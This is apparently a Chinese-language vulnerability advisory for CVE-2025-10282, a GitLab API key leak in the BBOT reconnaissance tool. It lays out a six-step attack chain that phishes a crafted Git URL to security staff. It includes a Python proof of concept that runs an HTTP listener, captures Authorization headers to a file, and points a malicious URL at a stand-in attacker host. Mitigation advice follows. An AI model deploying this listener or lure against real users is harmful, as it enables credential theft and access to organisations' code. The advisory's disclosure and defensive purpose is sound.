CVE-2025-10282 BBOT GitLab模块GitLab API密钥泄露漏洞

漏洞信息

漏洞编号

CVE-2025-10282

漏洞类型

信息泄露/凭证泄露

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

BBOT (Black Lantern Security)

漏洞概述

CVE-2025-10282是BBOT安全扫描工具GitLab模块中存在的一个信息泄露漏洞。BBOT是一款由Black Lantern Security开发的自动化侦察和攻击面映射工具，广泛用于安全评估和渗透测试。该漏洞存在于BBOT的GitLab模块中，攻击者可以通过构造恶意的Git URL格式，诱导BBOT将GitLab API密钥泄露到攻击者控制的远程服务器。

该漏洞的CVSS评分为4.7，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），但需要用户交互（UI:R）。这意味着攻击者需要诱使BBOT用户使用恶意的Git URL进行扫描操作才能触发漏洞。漏洞的影响范围为变更（S:C），主要影响机密性（低），对完整性和可用性没有影响。

该漏洞由Black Lantern Security团队的安全研究人员发现并报告，披露日期为2025年10月9日。由于BBOT常被安全研究人员和渗透测试人员使用，此漏洞可能被攻击者利用来窃取安全团队自身的GitLab API凭证，进而访问敏感的组织信息。

技术细节

BBOT的GitLab模块在处理Git URL时存在安全缺陷。当BBOT扫描目标时，其GitLab模块会尝试与目标GitLab实例进行交互，包括通过Git URL克隆或访问仓库。在处理过程中，模块会将GitLab API密钥作为认证信息附加到HTTP请求头中。

漏洞的根本原因在于BBOT GitLab模块没有充分验证和过滤Git URL中的主机名或路径部分。攻击者可以构造一个恶意的Git URL，例如使用类似`http://[email protected]/path`或通过URL重定向等方式，将原本发往合法GitLab服务器的API请求重定向到攻击者控制的服务器。

当BBOT用户使用恶意构造的Git URL触发扫描时，GitLab模块会按照URL的指示发起请求，并将包含GitLab API密钥的认证头信息发送到攻击者的服务器。攻击者可以通过监听其控制的服务器，捕获这些包含敏感凭证的请求，从而获取目标的GitLab API密钥。

利用条件：
1. 攻击者需要能够向BBOT用户提供恶意的Git URL（例如通过社会工程学）
2. BBOT用户需要执行包含该恶意URL的扫描任务
3. 攻击者需要控制一个能够接收HTTP请求的服务器

获取到GitLab API密钥后，攻击者可以使用该凭证访问目标组织的GitLab实例，获取项目代码、敏感信息，甚至可能利用GitLab的其他API接口进行进一步攻击。

攻击链分析

STEP 1

步骤1：环境准备

攻击者搭建并控制一台HTTP服务器，用于接收来自BBOT的包含GitLab API密钥的请求。

STEP 2

步骤2：构造恶意Git URL

攻击者构造一个特殊格式的Git URL，该URL利用BBOT GitLab模块的URL处理缺陷，将请求重定向到攻击者控制的服务器，同时携带GitLab API密钥。

STEP 3

步骤3：社会工程学攻击

攻击者通过钓鱼邮件、即时消息或其他方式，将恶意Git URL发送给目标组织的安全团队成员，诱使其在BBOT扫描任务中使用该URL。

STEP 4

步骤4：触发漏洞

受害者在BBOT中使用包含恶意URL的配置或目标执行扫描，BBOT的GitLab模块处理该URL时，将包含GitLab API密钥的认证信息发送到攻击者控制的服务器。

STEP 5

步骤5：凭证捕获

攻击者在其控制的服务器上捕获包含GitLab API密钥的HTTP请求，提取敏感凭证。

STEP 6

步骤6：利用泄露的API密钥

攻击者使用获取的GitLab API密钥访问目标组织的GitLab实例，窃取项目代码、敏感数据，或利用GitLab API进行进一步的攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10282 PoC - BBOT GitLab API Key Disclosure # The vulnerability is triggered when BBOT processes a maliciously formatted Git URL # in its GitLab module, causing the API key to be sent to an attacker-controlled server. # Step 1: Set up an attacker-controlled HTTP listener to capture credentials # Using netcat to listen for incoming requests import http.server import socketserver import sys class CredentialCaptureHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # Capture the Authorization header which may contain the GitLab API key auth_header = self.headers.get('Authorization', 'Not found') print(f"[+] Captured request to: {self.path}") print(f"[+] Authorization header: {auth_header}") # Log the captured credentials with open("captured_creds.txt", "a") as f: f.write(f"Path: {self.path}\n") f.write(f"Authorization: {auth_header}\n\n") self.send_response(200) self.end_headers() self.wfile.write(b"OK") # Step 2: Craft a malicious Git URL that redirects BBOT's GitLab module # to send API key to attacker server # Example malicious URL format: # http://attacker-server.com/path?redirect=gitlab.target.com # Or using URL with embedded credentials redirect malicious_git_url = "http://[email protected]/group/project.git" # Step 3: When the victim runs BBOT with this URL, the GitLab module # will send the API key to attacker-server.com print(f"[*] Malicious Git URL: {malicious_git_url}") print("[*] Start listener on port 80 to capture credentials...") # Start the capture server PORT = 80 with socketserver.TCPServer(("", PORT), CredentialCaptureHandler) as httpd: print(f"[+] Listening on port {PORT}...") httpd.serve_forever()

影响范围

BBOT GitLab模块所有受影响版本（具体版本范围请参考官方安全公告）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）避免在BBOT中使用来源不可信的Git URL；2）在网络层面监控出站HTTP请求，检测是否有API密钥泄露到外部服务器；3）使用网络代理或防火墙限制BBOT的网络访问范围，仅允许其访问已知合法的GitLab实例；4）考虑使用临时GitLab API密钥，并在使用后及时撤销和更换；5）对安全团队成员进行安全意识培训，警惕社会工程学攻击。